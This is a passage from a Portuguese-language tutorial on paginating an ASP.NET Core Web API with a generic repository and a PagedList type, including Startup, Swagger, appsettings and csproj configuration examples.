- O método `Take` indica que a partir do `Skip` serão retornados $$N$$ elementos, onde $$N$$ é a quantidade de elementos por página, ou seja, `Take(PageSize)`;
- No final é convertido em `List` usando `ToList()`.
Nesse momento a lista `items` contém todos os elementos da página indicada pelo *client*.
É importante lembrar que estamos criando um tipo baseado em `List` e podemos incluir dentro da própria classe com os métodos de lista os elementos de `items` ao `PagedList`, como é feito na linha 27: `AddRange(items)`.
O `PagedList` é tratado exatamente como um `List`, incluindo seus métodos e atributos. A diferença entre os dois são os atributos no corpo da `PagedList` e seu modo de inicialização: para criar um objeto do tipo `PagedList` é necessário que ele receba a `query`, o `PageSize` e o `PageNumber`.
# Repositório
No repositório precisamos implementar o GET paginado. Nesse projeto estamos usando Repositório Genérico (*Generic Repository*) e Padrão Repositório (*Repository Pattern*). Vejamos como ficou nossa interface `IRepository`:
```C#
using PagProj.Models;
using PagProj.Models.Pagination;
namespace PagProj.Repository.Interface
{
public interface IRepository<T> where T : BaseEntity
{
PagedList<T> GetAll(PaginationParameters paginationParameters);
T GetById(long id);
T Create(T item);
T Update(T item);
bool Delete(long id);
}
}
```
Nada de muito diferente na interface, há somente uma única mudança: o método `GetAll` retorna uma `PagedList<T>` e não um `List<T>` ou `IEnumerable<T>` como antes. Também, recebe um objeto do tipo `PaginationParameters`. Agora vamos a implementação `GenericRepository`:
```C#
using System.Data;
using System;
using System.Linq;
using Microsoft.EntityFrameworkCore;
using PagProj.Models;
using PagProj.Models.Pagination;
using PagProj.Models.Context;
using PagProj.Repository.Interface;
namespace PagProj.Repository
{
public class GenericRepository<T> : IRepository<T> where T : BaseEntity
{
private readonly ApplicationContext _context;
private readonly DbSet<T> _dataset;
public GenericRepository(ApplicationContext context)
{
_context = context;
_dataset = _context.Set<T>();
}
public T GetById(long id) => _dataset.SingleOrDefault(i => i.Id.Equals(id));
public PagedList<T> GetAll(PaginationParameters paginationParameters)
{
PagedList<T> pagedList = new PagedList<T>(
_dataset.OrderBy(i => i.Id),
paginationParameters.PageNumber,
paginationParameters.PageSize
);
return pagedList;
}
public T Create(T item)
{
try {
_dataset.Add(item);
_context.SaveChanges();
return item;
} catch(Exception) {
throw;
}
}
public T Update(T item)
{
var result = _dataset.SingleOrDefault(i => i.Id.Equals(item.Id));
if (result != null) {
try {
_context.Entry(result).CurrentValues.SetValues(item);
_context.SaveChanges();
return result;
} catch (Exception) {
throw;
}
}
return null;
}
public bool Delete(long id)
{
var result = _dataset.SingleOrDefault(i => i.Id.Equals(id));
if (result != null) {
try {
_dataset.Remove(result);
_context.SaveChanges();
return true;
} catch (Exception) {
throw;
}
}
return false;
}
}
}
```
Nada de muito diferente a não ser no método `GetAll`:
```C#
public PagedList<T> GetAll(PaginationParameters paginationParameters)
{
PagedList<T> pagedList = new PagedList<T>(
_dataset.OrderBy(i => i.Id),
paginationParameters.PageNumber,
paginationParameters.PageSize
);
return pagedList;
}
```
Observe que criamos na linha 3 um objeto do tipo `PagedList<T>` e retornamos ele ao final do método `GetAll`. Assim como mencionado anteriormente:
- É enviado o objeto do tipo `IQueryable<T>` que nesse caso é o `DbSet<T> _dataset`;
> É importante utilizar o `OrderBy` e a própria aplicação lança um *warning* informando essa importância, como mostra a imagem abaixo:
>
> 
>
> Isso acontece devido ao seguinte problema: imagine que a lista esteja ordenada de uma forma na primeira requisição de página e na segunda requisição esteja diferente, isso pode resultar em elementos que aparecerão diversas vezes ou em elementos que podem nunca aparecer na paginação.
- Também é informado os parâmetros do `PaginationPatameters`: o `PageNumber` (ou `CurrentPage`) e o `PageSize`.
A partir desse momento temos um objeto paginado `PagedList` com a *query* feita ao banco de dados.
# Configurações
Foram feitas algumas configurações no `Startup.cs` são elas:
- Acessando a *ConnectionString* do `appsettings.json` e configurando o *EntityFramework*:
```C#
var connectionString = Configuration["ConnectionStrings:MySqlConnectionString"];
services.AddDbContext<ApplicationContext> (
op => op.UseMySql(connectionString, ServerVersion.AutoDetect(connectionString))
);
```
- Configurando o *Swagger*:
```C#
services.AddSwaggerGen(c =>
{
c.SwaggerDoc("v1", new OpenApiInfo {
Title = "PagProj",
Version = "v1",
Description = "Base project for Data Pagination",
Contact = new OpenApiContact {
Name = "Ellison Guimarães",
Email = "ellison.guimaraes@gmail.com",
Url = new Uri("https://github.com/ellisonguimaraes")
}
});
// Configure XML Comments to Swagger
var xmlFile = $"{Assembly.GetExecutingAssembly().GetName().Name}.xml";
var xmlPath = Path.Combine(AppContext.BaseDirectory, xmlFile);
c.IncludeXmlComments(xmlPath);
});
```
- As Injeções de Dependência (DI) do Repositório Genérico (*GenericRepository*) e da camada de negócio:
```C#
services.AddScoped(typeof(IRepository<>), typeof(GenericRepository<>));
services.AddScoped<IStudentBusiness, StudentBusiness>();
```
Também foi inserido a *ConnectionString* ao `appsettings.json`:
```json
{
"ConnectionStrings": {
"MySqlConnectionString": "Server=localhost;DataBase=paginationdb;Uid=root;Pwd=admin"
},
"Logging": {
"LogLevel": {
"Default": "Information",
"Microsoft": "Warning",
"Microsoft.Hosting.Lifetime": "Information"
}
},
"AllowedHosts": "*"
}
```
E finalmente precisamos inserir as configurações de geração do arquivo de documentação do *Swagger* ao arquivo `csproj`:
```xml
<Project Sdk="Microsoft.NET.Sdk.Web">
<PropertyGroup>
<TargetFramework>net5.0</TargetFramework>
</PropertyGroup>
<ItemGroup>
<PackageReference Include="Pomelo.EntityFrameworkCore.MySql" Version="5.0.1" />
<PackageReference Include="Swashbuckle.AspNetCore" Version="5.6.3" />
</ItemGroup>
<!-- SWAGGER XML COMMENTS -->
<PropertyGroup>
<GenerateDocumentationFile>true</GenerateDocumentationFile>
<NoWarn>$(NoWarn);1591</NoWarn>
</PropertyGroup>
</Project>
```
# Referências
[Paging in ASP.NET Core Web API - Code Maze (code-maze.com)](https://code-maze.com/paging-aspnet-core-webapi/)
[Paging in ASP.NET Core Web API - YouTube](https://www.youtube.com/watch?v=nRyLXP7WLxI&ab_channel=CodeMaze)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.